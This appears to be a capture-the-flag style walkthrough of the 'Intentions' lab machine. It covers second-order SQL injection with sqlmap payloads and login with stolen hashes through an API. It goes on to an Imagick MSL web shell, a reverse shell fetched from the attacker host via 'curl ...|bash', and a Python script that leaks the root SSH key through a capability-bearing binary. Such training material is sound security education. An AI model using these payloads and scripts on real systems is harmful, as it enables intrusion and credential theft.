Intentions
Intentions
Difficulty: Hard
Classification: Official
Synopsis
Intentions is a hard Linux machine that starts off with an image gallery website which is prone to a
second-order SQL injection leading to the discovery of BCrypt hashes. Further enumeration
reveals a v2 API endpoint that allows authentication via hashes instead of passwords, leading to
admin access to the site. Within the admin panel the attacker will find a page that allows them to
edit the images within the gallery with the help of Imagick . The attacker is able to exploit the
Imagick object instantiation and gain code execution. Once the attacker has a shell as www-data
they will need to examine the Git history for the current project, where they will find credentials
for the user greg . Once logged in as greg the user will enumerate and find that they have access
to the /opt/scanner/scanner binary with extended capabilities, specifically
CAP_DAC_READ_SEARCH . This capability allows the attacker to exfiltrate sensitive files such as the
private SSH key of the root user, byte-by-byte. With the key the attacker is able to authenticate
through SSH as the root user.
Skills Required
Web enumeration
Skills Learned
Leveraging Arbitrary Object Instantiations via Imagick
Vulnerability Research
Scripting exploits
Enumeration
Nmap
ports=$(nmap -p- --min-rate=1000 -T4 10.129.83.115 | grep ^[0-9] | cut -d '/' -f
1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.83.115
The Nmap output reveals two open ports. On port 22 an SSH server is running, and on port 80
an Nginx web server. Since we don't currently have any valid SSH credentials we should begin our
enumeration by visiting port 80 .
Before we begin our enumeration process, we modify our /etc/hosts file to include
intentions.htb , so that we don't have to type the IP of the machine every time.
Nginx - Port 80
Upon visiting http://intentions.htb we observe a Login and Registrations page.
Before we register a new account, we attempt to discover directories using gobuster :
<SNIP>
===============================================================
2023/02/03 01:58:36 Starting gobuster in directory enumeration mode
===============================================================
http://intentions.htb/admin (Status: 302) [Size: 330] [-->
http://intentions.htb]
http://intentions.htb/css (Status: 301) [Size: 178] [-->
http://intentions.htb/css/]
http://intentions.htb/favicon.ico (Status: 200) [Size: 0]
http://intentions.htb/fonts (Status: 301) [Size: 178] [-->
http://intentions.htb/fonts/]
http://intentions.htb/gallery (Status: 302) [Size: 330] [-->
http://intentions.htb]
http://intentions.htb/js (Status: 301) [Size: 178] [-->
http://intentions.htb/js/]
http://intentions.htb/robots.txt (Status: 200) [Size: 24]
http://intentions.htb/storage (Status: 301) [Size: 178] [-->
http://intentions.htb/storage/]
Here we spot a few interesting entries, specifically that there is an /admin page of some sorts, a
/gallery page, and some type of /storage directory.
The gallery and feed options will show us some images as well as the genre they are associated
with:
On our profile we can see there is a new Favorite Genres feature with the default options of
food,travel,nature . Based on the context provided, we can infer that the API that powers the
feed page is leveraging this profile setting to display relevant content.
Given that this is one of the only places in the web application where we can supply some input to
be processed by the backend or API, we will continue our enumeration here and look for possible
injections or other suspicious responses and behaviour.
At this point, we can use ZAP (or another Web proxy, such as BurpSuite ) to intercept the
requests made by the Gallery application to the API. The requests of interest are:
Our goal now is to pass these requests to sqlmap , so we need to save the contents of each of
these requests into a file. We will save our POST request to /user/genres as
updateGenresRequest and it should look something like this:
{"genres":"food"}
We also save our GET request to /user/feed to fetchFeedRequest and it should look
something like this:
We now evaluate these request for possible SQL injection vulnerabilities using SQLMap .
Update Genres
This also yields no results. However, we know for a fact that the Favorite Genres options directly
affect our feed, so it's worth to explore our options a bit more in this scenario. SQLMap suggests
that we may want to try a tamper script:
If we manually interact with the update genres request endpoint, we can observe that a request
with spaces such as nature, animals , test will become nature,animals,test the next time
we visit the page, indicating that spaces are being actively removed.
Let's try our second-order SQLi check with a tamper script to change spaces:
sqlmap -r updateGenresRequest --second-req=fetchFeedRequest --batch --
tamper=space2comment
Note: Sometimes this may only identify a time-based SQL injection, at which point we can
optionally extend our check by specifying --dbms=MySQL --level=5
<SNIP>
---
Parameter: JSON genres ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"genres":"food') AND 4617=4617 AND ('CImT'='CImT"}
Now we can easily enumerate the target's database. First of all, we have to enumerate the
available tables using the --tables flag:
Database: intentions
[4 tables]
+---------------------------------------+
| gallery_images |
| migrations |
| personal_access_tokens |
| users |
+---------------------------------------+
Then, we can extract data from the users table using -T users and --dump :
During our browsing we notice that all requests are going through /api/v1/... . We can
manually play around with the version and check if v2 endpoints are also available.
<SNIP>
http://intentions.htb/api/v2/auth/login (Status: 405) [Size: 825]
http://intentions.htb/api/v2/auth/logout (Status: 405) [Size: 825]
http://intentions.htb/api/v2/auth/refresh (Status: 500) [Size: 6615]
http://intentions.htb/api/v2/auth/register (Status: 405) [Size: 825]
http://intentions.htb/api/v2/auth/user (Status: 302) [Size: 330]
[--> http://intentions.htb]
We know that the 405 code is returned when we attempt an invalid request method. This can be
verified by visiting the v2 login page directly.
The new feature here is that the original v1 endpoint accepted an email and a password
parameter, while the new v2 endpoint accepts an email and a hash . We can verify this by
performing the same request against the v1 endpoint:
During the SQL injection step, we recovered the uncrackable password hashes of two
administrator users. If the v2 API is indeed in use, we have a way to access the Gallery application
as an Administrator without cracking the hashes.
We can test our theory by trying to authenticate as one of the administrators using their hash:
curl -d
'[email protected]&hash=$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoT
tjpeMqpp4twa' -X POST http://intentions.htb/api/v2/auth/login
{"status":"success","name":"steve"}
Indeed, it seems that we can authenticate using hashes over v2 . The easiest way to proceed, is to
navigate to the login page, turn on request interception in our proxy and attempt to login with the
email [email protected] and the password
$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa .
When we intercept the request in our proxy, we change the URL to /api/v2... and the
password parameter to hash . It should look similar to the following:
We authenticate successfully and can now explore the admin panel, to which we must manually
navigate.
On there we see a news page which provides us with some interesting details. Apart from the legal
notice, we see some news regarding the v2 API. We already know about the password/hash
change but we also get a reference link to imagick , which is allegedly used to apply effects on the
images.
Moreover, there is a Users page that displays some basic information about the currently
registered users, but provides no additional functionality:
Upon navigating to the Images tab of the admin panel, we are presented with a list of the current
images, their genre, public URL, and a link to an Edit page.
Within this request we can see the following data being sent:
{"path":"/var/www/html/intentions/storage/app/public/animals/jevgeni-fil-
rz2Nh0U8vws-unsplash.jpg","effect":"swirl"}
Here, we can specify the absolute path to the file, as well as a string denoting the effect to apply.
We can attempt to mess with these parameters, such as pointing the path to the /etc/passwd
file:
{"path":"/etc/passwd","effect":"swirl"}
However, the API responds with a 422 status stating we have provided a bad image path.
Foothold
Let's review what we know so far about the web application.
We have an endpoint that's likely feeding a file path into an Imagick constructor
We know a full path on the system that results in publicly available files
Looking around the web on how to exploit Imagick constructors we come across this article,
which outlines how to exploit PHP's built-in classes via arbitrary object instantiation to achieve
RCE.
Since the exploit relies on a Remote File Inclusion (RFI), we first check our theory by starting up a
Python webserver and submitting a payload whose path points to our machine:
python3 -m http.server 80
{"path":"http://10.10.14.40/test","effect":"wave"}
This likely means that the target can be exploited in the way described in the aforementioned
article. We therefore start off using a modified version of the PoC provided in the article and save
it in a file called payload.msl :
As stated in the article, we use the caption: and info: schemes to try and obtain a web shell.
We also set the write path to the publicly-accessible directory on the target that we discovered
earlier.
Next, we need a way to send this file as a multipart form. The easiest way to do this is to open the
Developers Console in our browser, navigate to the Network tab, click one of the image effect
buttons, then right click the POST request to /modify and copy it as a cURL command.
-F 'path=vid:msl:/tmp/php*'
The full explanation lies in the article above, but this allows us to essentially target the available
PHP temporary files and include our MSL file that we are going to upload, without knowing its
exact name.
-F 'effect=asd'
The endpoint requires an effect parameter, but its contents don't matter.
Upon running the cURL command, we may see a 502 gateway error or an empty response. To
validate our success we can navigate to the following URL:
http://intentions.htb/storage/rce.php
We can attempt to run commands such as to list the files in the directory with the following
request:
http://intentions.htb/storage/rce.php?c=ls
This verifies that our payload ran successfully, and we can now execute arbitrary commands on
the target machine.
To obtain a reverse shell we create a shell file on our local machine with the following contents:
nc -nlvp 9001
Finally, we run a cURL command on the web shell and pipe it to bash to land us a shell.
http://intentions.htb/storage/rce.php?c=curl%2010.10.14.40/shell|bash
nc -nlvp 9001
Lateral Movement
At this point as www-data we can run the usual enumeration commands but we don't find
anything interesting. Looking at the root folder of the Intentions we application, we spot a .git
folder.
www-data@intentions:/var/www/html/intentions$ ls -al
total 820
drwxr-xr-x 14 root root 4096 Feb 2 2023 .
drwxr-xr-x 3 root root 4096 Feb 2 2023 ..
drwxr-xr-x 7 root root 4096 Apr 12 2022 app
-rwxr-xr-x 1 root root 1686 Apr 12 2022 artisan
<SNIP>
-rw-r--r-- 1 root root 1068 Feb 2 2023 .env
drwxr-xr-x 8 root root 4096 Feb 3 2023 .git
<SNIP>
Let's examine previous versions of the project by using the git log -p command.
Unfortunately, we are informed that we cannot run the log command as the .git folder is owned
by root .
If we try to rectify this through the suggested command , we get a permission error:
git config --global --add safe.directory /var/www/html/intentions
We will find that our lack of write access in /var/www causes us some issues.
Reading into the Git documentation we will find that it seeks the configuration file in the users
$HOME directory. We can easily get around our lack of write capability in /var/www by overwriting
our $HOME environmental variable.
Now, we are able to read through the logs and spot a password for the user greg :
commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4
Author: greg <[email protected]>
Date: Thu Jan 26 09:21:52 2023 +0100
Test cases did not work on steve's local database, switching to user factory
per his advice
greg@intentions:~$ id
uid=1001(greg) gid=1001(greg) groups=1001(greg),1003(scanner)
We notice that greg is part of the scanner group. The user flag can be found in
/home/greg/user.txt .
Privilege Escalation
Once authenticated as the user greg we can find some interesting files in his home directory:
dmca_check.sh and dmca_hashes.test .
greg@intentions:~$ ls -al
total 52
drwxr-x--- 4 greg greg 4096 Jun 19 13:09 .
drwxr-xr-x 5 root root 4096 Jun 10 14:56 ..
<SNIP>
-rwxr-x--- 1 root greg 75 Jun 10 17:33 dmca_check.sh
-rwxr----- 1 root greg 11044 Jun 10 15:31 dmca_hashes.test
<SNIP>
Looking into dmca_check.sh we can see that it executes the following command:
Interestingly enough, greg does not have access to actually inspect the specified file:
greg@intentions:~$ ls /home/legal/uploads/
This should be our first indication that something unusual is occurring in terms of access control
in this binary. Checking the binary itself, we can see it is not a setuid binary, and we are not
executing it with sudo :
The only way that's left for the binary to have read access to a file that we don't have is through
capabilities. Indeed, if we check the binary with getcap we can see that it has the
cap_dac_read_search capability.
/opt/scanner/scanner cap_dac_read_search=ep
Let's find out if we can exploit the functionality of the scanner binary to our advantage; executing
the scanner binary with no arguments provides us with some useful information:
greg@intentions:~$ /opt/scanner/scanner
Expected output:
1. Empty if no matches found
2. A line for every match, example:
[+] {LABEL} matches {FILE}
-c string
Path to image file to check. Cannot be combined with -d
-d string
Path to image directory to check. Cannot be combined with -c
-h string
Path to colon separated hash file. Not compatible with -p
-l int
Maximum bytes of files being checked to hash. Files smaller than this
value will be fully hashed. Smaller values are much faster but prone to false
positives. (default 500)
-p [Debug] Print calculated file hash. Only compatible with -c
-s string
Specific hash to check against. Not compatible with -h
As an image gallery, they are concerned about publishing copyrighted materials, and have
developed a utility to check file contents against a known blacklist of copyrighted files. There is
also a reference that this utility could be dual-purposed to try to avoid adding duplicate images to
the gallery as it grows in size.
To evaluate for matches, the binary is generating an MD5 hash for the contents of the file and
compares it against a user-provided blacklist. Reading the dmca_hashes.test file, we can see a
potential blacklist used by the gallery:
DMCA-#5133:218a61dfdebf15292a94c8efdd95ee3c
DMCA-#4034:a5eff6a2f4a3368707af82d3d8f665dc
DMCA-#7873:7b2ad34b92b4e1cb73365fe76302e6bd
DMCA-#2901:052c4bb8400a5dc6d40bea32dfcb70ed
DMCA-#9112:0def227f2cdf0bb3c44809470f28efb6
DMCA-#9564:b58b5d64a979327c6068d447365d2593
<SNIP>
The blacklist file contains a {LABEL}:{MD5} entry on each line. As observed from the
dmca_check.sh script, upon finding a match the program will inform us what label triggered the
hit, and which file it considers a match. The program also allows us to check a specific file with the
-c flag, or an entire directory with the -d flag.
At first glance this doesn't seem very helpful - we would need to know the contents of a sensitive
file to check if it is a match. However, digging deeper into the help text we can observe that the
user can control how many bytes of the file are going to get checked with the -l flag. By default
the program is checking the first 500 bytes of files, but the developers decided this may need to be
of variable length as more images come into play and the program needs to check the files faster.
Since MD5 hashing is a relatively fast procedure, we can leverage the the -l flag and essentially
brute force sensitive files byte-by-byte. We can craft a Python script that will generate a "blacklist"
with all printable characters and ask the scanner binary to check only the first byte of a sensitive
file. When the scanner gets a match, we will know the first byte of the file, and at that point, we will
create a new "blacklist" with the first character of the file plus all the printable characters and ask
the scanner to match the first two bytes. The cycle would go on until the end of the file.
For the purposes of this writeup, the final script looks as follows:
import string
import hashlib
import subprocess
base = ""
hasResult = True
hashMap = {}
readFile = "/root/.ssh/id_rsa"
def checkMatch():
global base
global hashMap
result = subprocess.Popen(["/opt/scanner/scanner","-c",readFile,"-
h","./hash.log","-l",str(len(base) + 1)], stdout=subprocess.PIPE)
for line in result.stdout:
#print(line)
line = str(line)
if "[+]" in line:
check = line.split(" ")
if len(check) == 4:
if check[1] in hashMap:
base = hashMap[check[1]]
return True
return False
def writeFile(base):
f = open("hash.log", "w")
hashmap = {}
for character in string.printable:
check = base + character
checkHash = hashlib.md5(check.encode())
md5 = checkHash.hexdigest()
hashMap[md5] = check
f.write(md5 + ":" + md5)
f.write("\n")
f.close()
while hasResult:
writeFile(base)
hasResult = checkMatch()
print("Found")
print(base)
print("Done")
The above script will take care of generating the hash "blacklist", executing the scanner program
with the appropriate arguments, and extract the target file- in this case the root user's private
SSH key:
Found
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA5yMuiPaWPr6P0GYiUi5EnqD8QOM9B7gm2lTHwlA7FMw95/wy8JW3
HqEMYrWSNpX2HqbvxnhOBCW/uwKMbFb4LPI+EzR6eHr5vG438EoeGmLFBvhge54WkTvQyd
<SNIP>
D7F0nauYkSG+eLwFAd9K/kcdxTuUlwvmPvQiNg70Z142bt1tKN8b3WbttB3sGq39jder8p
nhPKs4TzMzb0gvZGGVZyjqX68coFz3k1nAb5hRS5Q+P6y/XxmdBB4TEHqSQtQ4PoqDj2IP
DVJTokldQ0d4ghAAAAD3Jvb3RAaW50ZW50aW9ucwECAw==
-----END OPENSSH PRIVATE KEY-----
Done
We write the private key to a file called root_key , the apply the correct permissions on the file,
and authenticate as root on the remote machine.
chmod 600 root_key
ssh -i root [email protected]
root@intentions:~# id
uid=0(root) gid=0(root) groups=0(root)